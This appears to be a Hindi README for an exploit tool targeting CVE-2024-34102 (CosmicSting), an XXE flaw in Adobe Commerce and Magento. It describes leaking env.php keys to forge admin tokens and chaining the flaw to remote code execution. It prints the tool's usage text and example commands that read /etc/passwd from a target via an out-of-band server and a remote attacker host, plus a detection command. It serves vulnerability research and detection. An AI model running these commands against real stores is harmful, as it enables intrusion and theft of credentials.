
CosmicSting: Adobe Commerce और Magento में गंभीर बिना-प्रमाणीकरण XXE भेद्यता (CVE-2024-34102)
CVE-2024-34102 Adobe Commerce और Magento में नेस्टेड डिसीरियलाइज़ेशन के अनुचित प्रबंधन से उत्पन्न होने वाली एक गंभीर सुरक्षा भेद्यता है। यह भेद्यता हमलावरों को डिसीरियलाइज़ेशन प्रक्रिया के दौरान XML External Entities (XXE) का दोहन करने की अनुमति देती है, जिससे संभावित रूप से रिमोट कोड निष्पादन हो सकता है। संक्षेप में, हमलावर दुर्भावनापूर्ण JSON पेलोड तैयार कर सकते हैं, जिन्हें एप्लिकेशन द्वारा डिसीरियलाइज़ करने पर अनपेक्षित गुणों या व्यवहारों वाले ऑब्जेक्ट इंस्टैंशिएट होते हैं। इससे विभिन्न सुरक्षा जोखिम उत्पन्न हो सकते हैं।
इस भेद्यता का दोहन करने से हमलावर REST API, GraphQL API, या SOAP API तक अनधिकृत व्यवस्थापक पहुँच प्राप्त कर सकते हैं, जिससे संभावित रूप से डेटा चोरी, सेवा व्यवधान और प्रभावित सिस्टम का पूर्ण समझौता हो सकता है। यह भेद्यता महत्वपूर्ण जोखिम उत्पन्न करती है क्योंकि यह संवेदनशील फ़ाइलों, जैसे कि app/etc/env.php, को बाहर निकालने में सक्षम है, जिसमें प्रमाणीकरण के लिए उपयोग की जाने वाली क्रिप्टोग्राफ़िक कुंजियाँ होती हैं। हमलावर इसका दोहन करके व्यवस्थापक टोकन बना सकते हैं और विशेषाधिकार प्राप्त उपयोगकर्ताओं के रूप में Magento के API में हेरफेर कर सकते हैं।
इसके अलावा, CVE-2024-34102 को अन्य भेद्यताओं के साथ जोड़ा जा सकता है, जैसे कि PHP फ़िल्टर चेन एक्सप्लॉइट (CVE-2024-2961), जिससे रिमोट कोड निष्पादन (RCE) हो सकता है। XML External Entity (XXE) भेद्यताओं के व्यापक निहितार्थ हमलावरों को बाहरी स्रोतों से डेटा प्राप्त करने और उसमें हेरफेर करने में सक्षम बनाते हैं, जिससे समझौता किए गए सिस्टम पर संभावित प्रभाव और बढ़ जाता है।
usage: exploit.py [-h] --target TARGET --read-file READ_FILE [--oob-server OOB_SERVER] [--host-server HOST_SERVER]
Exploit script for XXE vulnerability
options:
-h, --help show this help message and exit
--target TARGET, -t TARGET
Target URL (http(s)://ip[:port])
--read-file READ_FILE, -r READ_FILE
File to read from the remote host
--oob-server OOB_SERVER, -ob OOB_SERVER
OOB server URL (http(s)://ip[:port])
--host-server HOST_SERVER, -hs HOST_SERVER
Host server URL (http(s)://ip[:port])
उदाहरण
# Run with local attacker server and local OOB server
python3 exploit.py -t https://magento.test -r "/etc/passwd"
# Run with remote attacker server and remote OOB server
python3 exploit.py -t https://magento.test --oob-server http://xxx.oasitfy.com --host-server https://remote-attacker-server.com -r "/etc/passwd"
# Detection
python3 detect.py -t https://magento.test
यह एक्सप्लॉइट स्क्रिप्ट केवल शोध और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्य से बनाई गई है। इसका उपयोग किसी भी दुर्भावनापूर्ण या अनधिकृत गतिविधियों के लिए नहीं किया जाना है। स्क्रिप्ट के लेखक और स्वामी इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए कोई ज़िम्मेदारी या दायित्व अस्वीकार करते हैं। उपयोगकर्ताओं से आग्रह किया जाता है कि वे इस सॉफ़्टवेयर का ज़िम्मेदारी से और केवल लागू कानूनों और विनियमों के अनुसार उपयोग करें। ज़िम्मेदारी से उपयोग करें।